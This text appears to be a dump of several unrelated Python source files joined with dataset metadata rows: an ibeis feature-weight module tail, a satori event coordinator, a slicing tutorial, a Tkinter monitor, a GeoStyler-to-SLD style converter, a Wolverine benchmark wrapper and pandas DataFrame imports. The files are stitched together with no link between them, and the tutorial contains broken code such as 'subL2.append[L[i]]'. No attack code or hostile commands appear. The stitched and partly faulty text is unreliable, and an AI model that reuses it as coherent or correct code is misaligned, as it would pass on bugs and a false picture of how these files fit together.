Example:
>>> # DISABLE_DOCTEST
>>> from ibeis.algo.preproc.preproc_featweight import * # NOQA
>>> import ibeis
>>> ibs = ibeis.opendb('testdb1')
>>> config2_ = ibs.new_query_params(dict(fg_on=True, fw_detector='rf'))
>>> aid_list = ibs.get_valid_aids()[1:2]
>>> fid_list = ibs.get_annot_feat_rowids(aid_list, ensure=True)
>>> #fid_list = ibs.get_valid_fids()[1:2]
>>> featweighttup_gen = generate_featweight_properties(ibs, fid_list, config2_=config2_)
>>> featweighttup_list = list(featweighttup_gen)
>>> featweight_list = featweighttup_list[0][0]
>>> featweight_test = featweight_list[0:3]
>>> featweight_target = [ 0.349, 0.218, 0.242]
>>> ut.assert_almost_eq(featweight_test, featweight_target, .3)
"""
# HACK: TODO AUTOGENERATE THIS
#cid_list = ibs.get_feat_cids(feat_rowid_list)
#aid_list = ibs.get_chip_aids(cid_list)
chip_rowid_list = ibs.dbcache.get(ibs.const.FEATURE_TABLE, ('chip_rowid',), feat_rowid_list)
aid_list = ibs.dbcache.get(ibs.const.CHIP_TABLE, ('annot_rowid',), chip_rowid_list)
featweight_list = compute_fgweights(ibs, aid_list, config2_=config2_)
return zip(featweight_list)
#def get_annot_probchip_fname_iter(ibs, aid_list):
# """ Returns probability chip path iterator
# Args:
# ibs (IBEISController):
# aid_list (list):
# Returns:
# probchip_fname_iter
# Example:
# >>> from ibeis.algo.preproc.preproc_featweight import * # NOQA
# >>> import ibeis
# >>> ibs = ibeis.opendb('testdb1')
# >>> aid_list = ibs.get_valid_aids()
# >>> probchip_fname_iter = get_annot_probchip_fname_iter(ibs, aid_list)
# >>> probchip_fname_list = list(probchip_fname_iter)
# """
# cfpath_list = ibs.get_annot_chip_fpath(aid_list, config2_=config2_)
# cfname_list = [splitext(basename(cfpath))[0] for cfpath in cfpath_list]
# suffix = ibs.cfg.detect_cfg.get_cfgstr()
# ext = '.png'
# probchip_fname_iter = (''.join([cfname, suffix, ext]) for cfname in cfname_list)
# return probchip_fname_iter
#def get_annot_probchip_fpath_list(ibs, aid_list):
# cachedir = get_probchip_cachedir(ibs)
# probchip_fname_list = get_annot_probchip_fname_iter(ibs, aid_list)
# probchip_fpath_list = [join(cachedir, fname) for fname in probchip_fname_list]
# return probchip_fpath_list
#class FeatWeightConfig(object):
# # TODO: Put this in a config
# def __init__(fw_cfg):
# fw_cfg.sqrt_area = 800
def on_delete(ibs, featweight_rowid_list, config2_=None):
# no external data to remove
return 0
if __name__ == '__main__':
"""
CommandLine:
python -m ibeis.algo.preproc.preproc_featweight
python -m ibeis.algo.preproc.preproc_featweight --allexamples
python -m ibeis.algo.preproc.preproc_featweight --allexamples --noface --nosrc
"""
import multiprocessing
multiprocessing.freeze_support() # for win32
import utool as ut # NOQA
ut.doctest_funcs()
| apache-2.0 | 8,091,099,537,909,222,000 | 40.74359 | 170 | 0.592061 | false |
zielmicha/satori | satori.events/satori/events/master.py | 1 | 7084 | # vim:ts=4:sts=4:sw=4:expandtab
"""Master (central) event coordinator.
"""
import collections
import select
from _multiprocessing import Connection
from multiprocessing.connection import Listener
from satori.objects import Argument
from .api import Manager
from .client import Client, Scheduler
from .mapper import Mapper
from .protocol import Command, KeepAlive, ProtocolError
class PollScheduler(Scheduler):
"""A Scheduler using select.poll on file descriptors.
"""
def __init__(self):
self.waits = select.poll()
self.fdmap = dict()
self.ready = collections.deque()
def next(self):
"""Return the next Client to handle.
A Client is available when its file descriptor is ready to be read from.
Available Clients are scheduler in a round-robin fashion.
"""
while len(self.ready) == 0:
for fileno, event in self.waits.poll():
client = self.fdmap[fileno]
if event & (select.POLLERR | select.POLLHUP) != 0:
self.remove(client)
self.ready.append(client)
return self.ready.popleft()
def add(self, client):
"""Add a Client to this Scheduler.
"""
fileno = client.fileno
if fileno in self.fdmap:
return
#print 'PollScheduler: registered new client with fd', fileno
self.fdmap[fileno] = client
self.waits.register(fileno, select.POLLIN | select.POLLHUP | select.POLLERR)
def remove(self, client):
"""Remove a Client from this Scheduler.
"""
fileno = client.fileno
if fileno not in self.fdmap:
return
self.waits.unregister(fileno)
del self.fdmap[fileno]
class SelectScheduler(Scheduler):
"""A Scheduler using select.select on file descriptors.
"""
def __init__(self):
self.fdmap = dict()
self.ready = collections.deque()
def next(self):
"""Return the next Client to handle.
A Client is available when its file descriptor is ready to be read from.
Available Clients are scheduler in a round-robin fashion.
"""
while len(self.ready) == 0:
for fileno in select.select(self.fdmap.keys(), [], [])[0]:
client = self.fdmap[fileno]
self.ready.append(client)
return self.ready.popleft()
def add(self, client):
"""Add a Client to this Scheduler.
"""
fileno = client.fileno
if fileno in self.fdmap:
return
self.fdmap[fileno] = client
def remove(self, client):
"""Remove a Client from this Scheduler.
"""
fileno = client.fileno
if fileno not in self.fdmap:
return
del self.fdmap[fileno]
class ConnectionClient(Client):
"""Out-of-process Client communicating over multiprocessing.Connection.
"""
@Argument('scheduler', type=Scheduler)
@Argument('connection', type=Connection)
def __init__(self, connection):
self.connection = connection
self.scheduler.add(self)
def sendResponse(self, response):
"""Send a response to this Client.
"""
self.connection.send(response)
def recvCommand(self):
"""Receive the next command from this Client.
"""
command = self.connection.recv()
if not isinstance(command, Command):
raise ProtocolError("received object is not a Command")
return command
def disconnect(self):
"""Disconnect this Client.
"""
self.scheduler.remove(self)
self.connection.close()
fileno = property(lambda self: self.connection.fileno())
class ListenerClient(Client):
"""In-process Client wrapping a multiprocessing.connection.Listener.
"""
@Argument('scheduler', type=Scheduler)
@Argument('listener', type=Listener)
def __init__(self, listener):
self.listener = listener
self.scheduler.add(self)
def sendResponse(self, response):
"""Send a response to this Client.
"""
pass
def recvCommand(self):
"""Receive the next command from this Client.
"""
try:
#print 'ListenerClient: waiting for connection'
connection = self.listener.accept()
#print 'ListenerClient: got connection'
except:
raise ProtocolError("Listener.accept() failed")
ConnectionClient(scheduler=self.scheduler, connection=connection)
return KeepAlive()
def disconnect(self):
"""Disconnect this Client.
"""
self.scheduler.remove(self)
self.listener.close()
# pylint: disable-msg=W0212
fileno = property(lambda self: self.listener._listener._socket.fileno())
# pylint: enable-msg=W0212
class Master(Manager):
"""The central Event Manager.
"""
@Argument('mapper', type=Mapper)
def __init__(self, mapper):
self.mapper = mapper
if hasattr(select, 'poll'):
self.scheduler = PollScheduler()
else:
self.scheduler = SelectScheduler()
self.serial = 0
def connectSlave(self, connection):
"""Attach a new Slave over the given connection.
"""
ConnectionClient(scheduler=self.scheduler, connection=connection)
def listen(self, listener):
"""Listen for new Slave connections using the given Listener.
"""
ListenerClient(scheduler=self.scheduler, listener=listener)
def _print(self, command, sender):
pass
#print 'event master: received', command, 'from', sender
def _handleKeepAlive(self, _command, sender):
self._print(_command, sender)
sender.sendResponse(None)
def _handleDisconnect(self, _command, sender):
self._print(_command, sender)
sender.disconnect()
def _handleAttach(self, command, sender):
self._print(command, sender)
self.dispatcher.attach(sender, command.queue_id)
sender.sendResponse(None)
def _handleDetach(self, command, sender):
self._print(command, sender)
self.dispatcher.detach(sender, command.queue_id)
sender.sendResponse(None)
def _handleMap(self, command, sender):
self._print(command, sender)
mapping_id = self.mapper.map(command.criteria, command.queue_id)
sender.sendResponse(mapping_id)
def _handleUnmap(self, command, sender):
self._print(command, sender)
self.mapper.unmap(command.mapping_id)
sender.sendResponse(None)
def _handleSend(self, command, sender):
self._print(command, sender)
event = command.event
event.serial = self.serial
self.serial += 1
sender.sendResponse(event.serial)
for queue_id in self.mapper.resolve(event):
self.dispatcher.enqueue(queue_id, event)
def _handleReceive(self, _command, sender):
self._print(_command, sender)
self.dispatcher.activate(sender)
| mit | -971,804,800,364,368,400 | 29.273504 | 84 | 0.619565 | false |
zhlooking/LearnPython | Advaced_Features/slice.py | 1 | 1281 | L = ['Micheal', 'Hanson', 'William', 'Lucy', 'Frank']
# if you want to get the first three values in a list
# 1> The simplest way
def getFirstThreeValueOfList1(L):
subL1 = [L[0], L[1], L[2]]
return subL1
# 2> Use a loop
def getSubList(L = None, n = 3):
if (not isinstance(L, (list)) and not isinstance(n, (int, float))):
raise TypeError('bad operand type')
subL2 = []
for i in range(n):
subL2.append[L[i]]
return subL2
# 3> Use Slice feature
def getSubListBySlice(L, first = 0, last = -1):
if (not isinstance(L, (list)) and not isinstance((first, last), (int, float))):
raise TypeError('bad operand type')
if last > 0 and last > first:
return L[first:last]
elif last < 0 and last + len(L) > first:
return L[first:last]
else:
raise TypeError('Argument value error')
#
# Test
print L
print getSubListBySlice(L, 0, 2)
print getSubListBySlice(L, 3)
print getSubListBySlice(L, -3)
print getSubListBySlice(L, 20, 30)
####If there is a list and you want to get a value every 3 values behind
def getValuePerXValue(L, n):
return L[::n]
# Test
NumList = range(100)
print getValuePerXValue(NumList, 22)
#### Iterator ####
from collections import Iterable
print isinstance('ABC', Iterable)
print isinstance([], Iterable)
print isinstance(123, Iterable)
| mit | 1,213,449,190,329,562,000 | 24.117647 | 80 | 0.68306 | false |
ryfeus/lambda-packs | Spacy/source2.7/plac_tk.py | 1 | 1888 | from __future__ import print_function
import os
import sys
import Queue
import plac_core
from Tkinter import Tk
from ScrolledText import ScrolledText
from plac_ext import Monitor, TerminatedProcess
class TkMonitor(Monitor):
"""
An interface over a dictionary {taskno: scrolledtext widget}, with
methods add_listener, del_listener, notify_listener and start/stop.
"""
def __init__(self, name, queue=None):
Monitor.__init__(self, name, queue)
self.widgets = {}
@plac_core.annotations(taskno=('task number', 'positional', None, int))
def add_listener(self, taskno):
"There is a ScrolledText for each task"
st = ScrolledText(self.root, height=5)
st.insert('end', 'Output of task %d\n' % taskno)
st.pack()
self.widgets[taskno] = st
@plac_core.annotations(taskno=('task number', 'positional', None, int))
def del_listener(self, taskno):
del self.widgets[taskno]
@plac_core.annotations(taskno=('task number', 'positional', None, int))
def notify_listener(self, taskno, msg):
w = self.widgets[taskno]
w.insert('end', msg + '\n')
w.update()
def start(self):
'Start the mainloop'
self.root = Tk()
self.root.title(self.name)
self.root.wm_protocol("WM_DELETE_WINDOW", self.stop)
self.root.after(0, self.read_queue)
try:
self.root.mainloop()
except KeyboardInterrupt:
print('Process %d killed by CTRL-C' % os.getpid(), file=sys.stderr)
except TerminatedProcess:
pass
def stop(self):
self.root.quit()
def read_queue(self):
try:
cmd_args = self.queue.get_nowait()
except Queue.Empty:
pass
else:
getattr(self, cmd_args[0])(*cmd_args[1:])
self.root.after(100, self.read_queue)
| mit | 2,970,059,258,354,080,000 | 29.95082 | 79 | 0.610169 | false |
tomchadwin/qgis2web | qgis2web/bridgestyle/sld/fromgeostyler.py | 1 | 20761 | import os
from xml.etree.ElementTree import Element, SubElement
from xml.etree import ElementTree
from xml.dom import minidom
from .transformations import processTransformation
import zipfile
_warnings = []
# return a dictionary<int,list of rules>, where int is the Z value
# symbolizers are marked with a Z
#
# a rule (with multiple sybolizers) will have the rule replicated, one for each Z value found in the symbolizer
#
# ie. rule[0]["symbolizers"][0] has Z=0
# rule[0]["symbolizers"][1] has Z=1
#
# this will return
# result[0] => rule with symbolizer 0 (name changed to include Z=0)
# result[1] => rule with symbolizer 1 (name changed to include Z=1)
def processRulesByZ(rules):
result = {}
for rule in rules:
for symbolizer in rule["symbolizers"]:
z = symbolizer.get("Z", 0)
if z not in result:
result[z] = []
r = result[z]
rule_copy = rule.copy()
rule_copy["symbolizers"] = [symbolizer]
rule_copy["name"] += ", Z=" + str(z)
r.append(rule_copy)
return result
def convert(geostyler):
global _warnings
_warnings = []
attribs = {
"version": "1.0.0",
"xsi:schemaLocation": "http://www.opengis.net/sld StyledLayerDescriptor.xsd",
"xmlns": "http://www.opengis.net/sld",
"xmlns:ogc": "http://www.opengis.net/ogc",
"xmlns:xlink": "http://www.w3.org/1999/xlink",
"xmlns:xsi": "http://www.w3.org/2001/XMLSchema-instance",
}
rulesByZ = processRulesByZ(geostyler["rules"])
root = Element("StyledLayerDescriptor", attrib=attribs)
namedLayer = SubElement(root, "NamedLayer")
layerName = SubElement(namedLayer, "Name")
layerName.text = geostyler["name"]
userStyle = SubElement(namedLayer, "UserStyle")
userStyleTitle = SubElement(userStyle, "Title")
userStyleTitle.text = geostyler["name"]
z_values = list(rulesByZ.keys())
z_values.sort()
for z_value in z_values:
zrules = rulesByZ[z_value]
featureTypeStyle = SubElement(userStyle, "FeatureTypeStyle")
if "transformation" in geostyler:
featureTypeStyle.append(processTransformation(geostyler["transformation"]))
for rule in zrules:
featureTypeStyle.append(processRule(rule))
if "blendMode" in geostyler:
_addVendorOption(featureTypeStyle, "composite", geostyler["blendMode"])
sldstring = ElementTree.tostring(root, encoding="utf8", method="xml").decode()
dom = minidom.parseString(sldstring)
result = dom.toprettyxml(indent=" "), _warnings
return result
def processRule(rule):
ruleElement = Element("Rule")
ruleName = SubElement(ruleElement, "Name")
ruleName.text = rule.get("name", "")
ruleFilter = rule.get("filter", None)
if ruleFilter == "ELSE":
filterElement = Element("ElseFilter")
ruleElement.append(filterElement)
else:
filt = convertExpression(ruleFilter)
if filt is not None:
filterElement = Element("ogc:Filter")
filterElement.append(filt)
ruleElement.append(filterElement)
if "scaleDenominator" in rule:
scale = rule["scaleDenominator"]
if "min" in scale:
minScale = SubElement(ruleElement, "MinScaleDenominator")
minScale.text = str(scale["min"])
if "max" in scale:
maxScale = SubElement(ruleElement, "MaxScaleDenominator")
maxScale.text = str(scale["max"])
symbolizers = _createSymbolizers(rule["symbolizers"])
ruleElement.extend(symbolizers)
return ruleElement
def _createSymbolizers(symbolizers):
sldSymbolizers = []
for sl in symbolizers:
symbolizer = _createSymbolizer(sl)
if symbolizer is not None:
if isinstance(symbolizer, list):
sldSymbolizers.extend(symbolizer)
else:
sldSymbolizers.append(symbolizer)
return sldSymbolizers
def _createSymbolizer(sl):
symbolizerType = sl["kind"]
if symbolizerType == "Icon":
symbolizer = _iconSymbolizer(sl)
if symbolizerType == "Line":
symbolizer = _lineSymbolizer(sl)
if symbolizerType == "Fill":
symbolizer = _fillSymbolizer(sl)
if symbolizerType == "Mark":
symbolizer = _markSymbolizer(sl)
if symbolizerType == "Text":
symbolizer = _textSymbolizer(sl)
if symbolizerType == "Raster":
symbolizer = _rasterSymbolizer(sl)
if not isinstance(symbolizer, list):
symbolizer = [symbolizer]
for s in symbolizer:
geom = _geometryFromSymbolizer(sl)
if geom is not None:
s.insert(0, geom)
return symbolizer
def _symbolProperty(sl, name, default=None):
if name in sl:
return _processProperty(sl[name])
else:
return default
def _processProperty(value):
v = convertExpression(value)
if isinstance(v, Element) and v.tag == "ogc:Literal":
v = v.text
return v
def _addValueToElement(element, value):
if value is not None:
if isinstance(value, Element):
element.append(value)
else:
element.text = str(value)
def _addCssParameter(parent, name, value):
if value is not None:
sub = SubElement(parent, "CssParameter", name=name)
_addValueToElement(sub, value)
return sub
def _addSubElement(parent, tag, value=None, attrib={}):
strAttrib = {k: str(v) for k, v in attrib.items()}
sub = SubElement(parent, tag, strAttrib)
_addValueToElement(sub, value)
return sub
def _addVendorOption(parent, name, value):
if value is not None:
sub = SubElement(parent, "VendorOption", name=name)
_addValueToElement(sub, value)
return sub
def _rasterSymbolizer(sl):
opacity = sl["opacity"]
root = Element("RasterSymbolizer")
_addSubElement(root, "Opacity", opacity)
channelSelectionElement = _addSubElement(root, "ChannelSelection")
for chanName in ["grayChannel", "redChannel", "greenChannel", "blueChannel"]:
if chanName in sl["channelSelection"]:
sldChanName = chanName[0].upper() + chanName[1:]
channel = _addSubElement(channelSelectionElement, sldChanName)
_addSubElement(
channel,
"SourceChannelName",
sl["channelSelection"][chanName]["sourceChannelName"],
)
if "colorMap" in sl:
colMap = sl["colorMap"]
colMapElement = _addSubElement(
root, "ColorMap", None, {"type": sl["colorMap"]["type"]}
)
for entry in colMap["colorMapEntries"]:
attribs = {
"color": entry["color"],
"quantity": entry["quantity"],
"label": entry["label"],
"opacity": entry["opacity"],
}
_addSubElement(colMapElement, "ColorMapEntry", None, attribs)
return root
def _textSymbolizer(sl):
color = _symbolProperty(sl, "color")
fontFamily = _symbolProperty(sl, "font")
label = _symbolProperty(sl, "label")
size = _symbolProperty(sl, "size")
root = Element("TextSymbolizer")
_addSubElement(root, "Label", label)
fontElem = _addSubElement(root, "Font")
_addCssParameter(fontElem, "font-family", fontFamily)
_addCssParameter(fontElem, "font-size", size)
if "offset" in sl:
placement = _addSubElement(root, "LabelPlacement")
pointPlacement = _addSubElement(placement, "PointPlacement")
if "anchor" in sl:
anchor = sl["anchor"]
# TODO: Use anchor
# centers
achorLoc = _addSubElement(pointPlacement, "AnchorPoint")
_addSubElement(achorLoc, "AnchorPointX", "0.5")
_addSubElement(achorLoc, "AnchorPointY", "0.5")
displacement = _addSubElement(pointPlacement, "Displacement")
offset = sl["offset"]
offsetx = _processProperty(offset[0])
offsety = _processProperty(offset[1])
_addSubElement(displacement, "DisplacementX", offsetx)
_addSubElement(displacement, "DisplacementY", offsety)
if "rotate" in sl:
rotation = _symbolProperty(sl, "rotate")
_addSubElement(displacement, "Rotation", rotation)
elif "perpendicularOffset" in sl and "background" not in sl:
placement = _addSubElement(root, "LabelPlacement")
linePlacement = _addSubElement(placement, "LinePlacement")
offset = sl["perpendicularOffset"]
dist = _processProperty(offset)
_addSubElement(linePlacement, "PerpendicularOffset", dist)
if "haloColor" in sl and "haloSize" in sl:
haloElem = _addSubElement(root, "Halo")
_addSubElement(haloElem, "Radius", sl["haloSize"])
haloFillElem = _addSubElement(haloElem, "Fill")
_addCssParameter(haloFillElem, "fill", sl["haloColor"])
_addCssParameter(haloFillElem, "fill-opacity", sl["haloOpacity"])
fillElem = _addSubElement(root, "Fill")
_addCssParameter(fillElem, "fill", color)
followLine = sl.get("followLine", False)
if followLine:
_addVendorOption(root, "followLine", True)
_addVendorOption(root, "group", "yes")
elif "background" not in sl:
_addVendorOption(root, "autoWrap", 50)
if "background" in sl:
background = sl["background"]
avg_size = max(background["sizeX"], background["sizeY"])
shapeName = "rectangle"
if background["shapeType"] == "circle" or background["shapeType"] == "elipse":
shapeName = "circle"
graphic = _addSubElement(root, "Graphic")
mark = _addSubElement(graphic, "Mark")
_addSubElement(graphic, "Opacity", background["opacity"])
_addSubElement(mark, "WellKnownName", shapeName)
fill = _addSubElement(mark, "Fill")
stroke = _addSubElement(mark, "Stroke")
_addCssParameter(stroke, "stroke", background["strokeColor"])
_addCssParameter(fill, "fill", background["fillColor"])
if background["sizeType"] == "buffer":
_addVendorOption(root, "graphic-resize", "stretch")
_addVendorOption(root, "graphic-margin", str(avg_size))
_addVendorOption(root, "spaceAround", str(25))
else:
_addSubElement(graphic, "Size", str(avg_size))
placement = _addSubElement(root, "LabelPlacement")
pointPlacement = _addSubElement(placement, "PointPlacement")
# centers
achorLoc = _addSubElement(pointPlacement, "AnchorPoint")
_addSubElement(achorLoc, "AnchorPointX", "0.5")
_addSubElement(achorLoc, "AnchorPointY", "0.5")
return root
def _lineSymbolizer(sl, graphicStrokeLayer=0):
opacity = _symbolProperty(sl, "opacity")
color = sl.get("color", None)
graphicStroke = sl.get("graphicStroke", None)
width = _symbolProperty(sl, "width")
dasharray = _symbolProperty(sl, "dasharray")
cap = _symbolProperty(sl, "cap")
join = _symbolProperty(sl, "join")
offset = _symbolProperty(sl, "perpendicularOffset")
root = Element("LineSymbolizer")
symbolizers = [root]
stroke = _addSubElement(root, "Stroke")
if graphicStroke is not None:
graphicStrokeElement = _addSubElement(stroke, "GraphicStroke")
graphic = _graphicFromSymbolizer(graphicStroke[graphicStrokeLayer])
graphicStrokeElement.append(graphic[0])
interval = sl.get("graphicStrokeInterval")
dashOffset = sl.get("graphicStrokeOffset")
size = graphicStroke[graphicStrokeLayer].get("size")
try:
fsize = float(size)
finterval = float(interval)
_addCssParameter(
stroke, "stroke-dasharray", "%s %s" % (str(fsize), str(finterval))
)
except:
_addCssParameter(stroke, "stroke-dasharray", "10 10")
_addCssParameter(stroke, "stroke-dashoffset", dashOffset)
if graphicStrokeLayer == 0 and len(graphicStroke) > 1:
for i in range(1, len(graphicStroke)):
symbolizers.extend(_lineSymbolizer(sl, i))
if color is not None:
_addCssParameter(stroke, "stroke", color)
_addCssParameter(stroke, "stroke-width", width)
_addCssParameter(stroke, "stroke-opacity", opacity)
_addCssParameter(stroke, "stroke-linejoin", join)
_addCssParameter(stroke, "stroke-linecap", cap)
if dasharray is not None:
if cap != "butt":
try:
EXTRA_GAP = 2 * width
tokens = [
int(v) + EXTRA_GAP if i % 2 else int(v)
for i, v in enumerate(dasharray.split(" "))
]
except: # in case width is not a number, but an expression
GAP_FACTOR = 2
tokens = [
int(v) * GAP_FACTOR if i % 2 else int(v)
for i, v in enumerate(dasharray.split(" "))
]
dasharray = " ".join([str(v) for v in tokens])
_addCssParameter(stroke, "stroke-dasharray", dasharray)
if offset is not None:
_addSubElement(root, "PerpendicularOffset", offset)
return symbolizers
def _geometryFromSymbolizer(sl):
geomExpr = convertExpression(sl.get("Geometry", None))
if geomExpr is not None:
geomElement = Element("Geometry")
geomElement.append(geomExpr)
return geomElement
def _iconSymbolizer(sl):
path = sl["image"]
if path.lower().endswith("svg"):
return _svgMarkerSymbolizer(sl)
else:
return _rasterImageMarkerSymbolizer(sl)
def _svgMarkerSymbolizer(sl):
root, graphic = _basePointSimbolizer(sl)
svg = _svgGraphic(sl)
graphic.insert(0, svg)
return root
def _rasterImageMarkerSymbolizer(sl):
root, graphic = _basePointSimbolizer(sl)
img = _rasterImageGraphic(sl)
graphic.insert(0, img)
return root
def _markSymbolizer(sl):
root, graphic = _basePointSimbolizer(sl)
mark = _markGraphic(sl)
graphic.insert(0, mark)
return root
def _basePointSimbolizer(sl):
size = _symbolProperty(sl, "size")
rotation = _symbolProperty(sl, "rotate")
opacity = _symbolProperty(sl, "opacity")
offset = sl.get("offset", None)
root = Element("PointSymbolizer")
graphic = _addSubElement(root, "Graphic")
_addSubElement(graphic, "Opacity", opacity)
_addSubElement(graphic, "Size", size)
_addSubElement(graphic, "Rotation", rotation)
if offset:
displacement = _addSubElement(graphic, "Displacement")
_addSubElement(displacement, "DisplacementX", offset[0])
_addSubElement(displacement, "DisplacementY", offset[1])
return root, graphic
def _markGraphic(sl):
color = _symbolProperty(sl, "color")
outlineColor = _symbolProperty(sl, "strokeColor")
fillOpacity = _symbolProperty(sl, "fillOpacity", 1.0)
strokeOpacity = _symbolProperty(sl, "strokeOpacity", 1.0)
outlineWidth = _symbolProperty(sl, "strokeWidth")
outlineDasharray = _symbolProperty(sl, "strokeDasharray")
shape = _symbolProperty(sl, "wellKnownName")
mark = Element("Mark")
_addSubElement(mark, "WellKnownName", shape)
if fillOpacity:
fill = SubElement(mark, "Fill")
_addCssParameter(fill, "fill", color)
_addCssParameter(fill, "fill-opacity", fillOpacity)
stroke = _addSubElement(mark, "Stroke")
if strokeOpacity:
_addCssParameter(stroke, "stroke", outlineColor)
_addCssParameter(stroke, "stroke-width", outlineWidth)
_addCssParameter(stroke, "stroke-opacity", strokeOpacity)
if outlineDasharray is not None:
_addCssParameter(stroke, "stroke-dasharray", outlineDasharray)
return mark
def _svgGraphic(sl):
path = os.path.basename(sl["image"])
color = _symbolProperty(sl, "color")
outlineColor = _symbolProperty(sl, "strokeColor")
outlineWidth = _symbolProperty(sl, "strokeWidth")
mark = Element("Mark")
_addSubElement(mark, "WellKnownName", "file://%s" % path)
fill = _addSubElement(mark, "Fill")
_addCssParameter(fill, "fill", color)
stroke = _addSubElement(mark, "Stroke")
_addCssParameter(stroke, "stroke", outlineColor)
_addCssParameter(stroke, "stroke-width", outlineWidth)
return mark
def _rasterImageGraphic(sl):
path = os.path.basename(sl["image"])
externalGraphic = Element("ExternalGraphic")
attrib = {"xlink:type": "simple", "xlink:href": path}
SubElement(externalGraphic, "OnlineResource", attrib=attrib)
_addSubElement(
externalGraphic, "Format", "image/%s" % os.path.splitext(path)[1][1:]
)
return externalGraphic
def _baseFillSymbolizer(sl):
root = Element("PolygonSymbolizer")
return root
def _graphicFromSymbolizer(sl):
symbolizers = _createSymbolizer(sl)
graphics = []
for s in symbolizers:
graphics.extend([graph for graph in s.iter("Graphic")])
return graphics
def _fillSymbolizer(sl, graphicFillLayer=0):
root = _baseFillSymbolizer(sl)
symbolizers = [root]
opacity = float(_symbolProperty(sl, "opacity", 1))
color = sl.get("color", None)
graphicFill = sl.get("graphicFill", None)
offset = sl.get("offset", None)
if graphicFill is not None:
margin = _symbolProperty(sl, "graphicFillMarginX")
fill = _addSubElement(root, "Fill")
graphicFillElement = _addSubElement(fill, "GraphicFill")
graphic = _graphicFromSymbolizer(graphicFill[graphicFillLayer])
graphicFillElement.append(graphic[0])
_addVendorOption(root, "graphic-margin", margin)
if graphicFillLayer == 0 and len(graphicFill) > 1:
for i in range(1, len(graphicFill)):
symbolizers.extend(_fillSymbolizer(sl, i))
if color is not None:
fillOpacity = float(_symbolProperty(sl, "fillOpacity", 1))
fill = _addSubElement(root, "Fill")
_addCssParameter(fill, "fill", color)
_addCssParameter(fill, "fill-opacity", fillOpacity * opacity)
outlineColor = _symbolProperty(sl, "outlineColor")
if outlineColor is not None:
outlineDasharray = _symbolProperty(sl, "outlineDasharray")
outlineWidth = _symbolProperty(sl, "outlineWidth")
outlineOpacity = float(_symbolProperty(sl, "outlineOpacity"))
# borderWidthUnits = props["outline_width_unit"]
stroke = _addSubElement(root, "Stroke")
_addCssParameter(stroke, "stroke", outlineColor)
_addCssParameter(stroke, "stroke-width", outlineWidth)
_addCssParameter(stroke, "stroke-opacity", outlineOpacity * opacity)
# _addCssParameter(stroke, "stroke-linejoin", join)
# _addCssParameter(stroke, "stroke-linecap", cap)
if outlineDasharray is not None:
_addCssParameter(
stroke, "stroke-dasharray", " ".join(str(v) for v in outlineDasharray)
)
if offset:
pass # TODO: Not sure how to add this in SLD
return symbolizers
#######################
operators = [
"PropertyName",
"Or",
"And",
"PropertyIsEqualTo",
"PropertyIsNotEqualTo",
"PropertyIsLessThanOrEqualTo",
"PropertyIsGreaterThanOrEqualTo",
"PropertyIsLessThan",
"PropertyIsGreaterThan",
"PropertyIsLike",
"Add",
"Sub",
"Mul",
"Div",
"Not",
]
operatorToFunction = {
"PropertyIsEqualTo": "equalTo",
"PropertyIsNotEqualTo": "notEqual",
"PropertyIsLessThanOrEqualTo": "lessEqualThan",
"PropertyIsGreaterThanOrEqualTo": "greaterEqualThan",
"PropertyIsLessThan": "lessThan",
"PropertyIsGreaterThan": "greaterThan",
}
def convertExpression(exp, inFunction=False):
if exp is None:
return None
elif isinstance(exp, list):
if exp[0] in operators and not (inFunction and exp[0] in operatorToFunction):
return handleOperator(exp)
else:
return handleFunction(exp)
else:
return handleLiteral(exp)
def handleOperator(exp):
name = exp[0]
elem = Element("ogc:" + name)
if name == "PropertyIsLike":
elem.attrib["wildCard"] = "%"
if name == "PropertyName":
elem.text = exp[1]
else:
for operand in exp[1:]:
elem.append(convertExpression(operand))
return elem
def handleFunction(exp):
name = operatorToFunction.get(exp[0], exp[0])
elem = Element("ogc:Function", name=name)
if len(exp) > 1:
for arg in exp[1:]:
elem.append(convertExpression(arg, True))
return elem
def handleLiteral(v):
elem = Element("ogc:Literal")
elem.text = str(v)
return elem
| gpl-2.0 | 1,951,233,122,359,109,400 | 33.601667 | 111 | 0.630943 | false |
TommesDee/cpachecker | scripts/benchmark/tools/wolverine.py | 2 | 1148 | import subprocess
import benchmark.util as Util
import benchmark.tools.template
import benchmark.result as result
class Tool(benchmark.tools.template.BaseTool):
def getExecutable(self):
return Util.findExecutable('wolverine')
def getVersion(self, executable):
return subprocess.Popen([executable, '--version'],
stdout=subprocess.PIPE).communicate()[0].split()[1].strip()
def getName(self):
return 'Wolverine'
def getStatus(self, returncode, returnsignal, output, isTimeout):
if "VERIFICATION SUCCESSFUL" in output:
assert returncode == 0
status = result.STR_TRUE
elif "VERIFICATION FAILED" in output:
assert returncode == 10
status = result.STR_FALSE_LABEL
elif returnsignal == 9:
status = "TIMEOUT"
elif returnsignal == 6 or (returncode == 6 and "Out of memory" in output):
status = "OUT OF MEMORY"
elif returncode == 6 and "PARSING ERROR" in output:
status = "PARSING ERROR"
else:
status = "FAILURE"
return status | apache-2.0 | 3,404,873,571,651,703,300 | 30.054054 | 91 | 0.614111 | false |
zfrenchee/pandas | pandas/core/frame.py | 1 | 233731 | """
DataFrame
---------
An efficient 2D container for potentially mixed-type time series or other
labeled data series.
Similar to its R counterpart, data.frame, except providing automatic data
alignment and a host of useful data manipulation methods having to do with the
labeling information
"""
from __future__ import division
# pylint: disable=E1101,E1103
# pylint: disable=W0212,W0231,W0703,W0622
import functools
import collections
import itertools
import sys
import types
import warnings
from textwrap import dedent
import numpy as np
import numpy.ma as ma
from pandas.core.dtypes.cast import (
maybe_upcast,
cast_scalar_to_array,
maybe_cast_to_datetime,
maybe_infer_to_datetimelike,
maybe_convert_platform,
maybe_downcast_to_dtype,
invalidate_string_dtypes,
coerce_to_dtypes,
maybe_upcast_putmask,
find_common_type)
from pandas.core.dtypes.common import (
is_categorical_dtype,
is_object_dtype,
is_extension_type,
is_datetimetz,
is_datetime64_any_dtype,
is_datetime64tz_dtype,
is_bool_dtype,
is_integer_dtype,
is_float_dtype,
is_integer,
is_scalar,
is_dtype_equal,
needs_i8_conversion,
_get_dtype_from_object,
_ensure_float,
_ensure_float64,
_ensure_int64,
_ensure_platform_int,
is_list_like,
is_nested_list_like,
is_iterator,
is_sequence,
is_named_tuple)
from pandas.core.dtypes.missing import isna, notna
from pandas.core.common import (_try_sort,
_default_index,
_values_from_object,
_maybe_box_datetimelike,
_dict_compat,
standardize_mapping)
from pandas.core.generic import NDFrame, _shared_docs
from pandas.core.index import (Index, MultiIndex, _ensure_index,
_ensure_index_from_sequences)
from pandas.core.indexing import (maybe_droplevels, convert_to_index_sliceable,
check_bool_indexer)
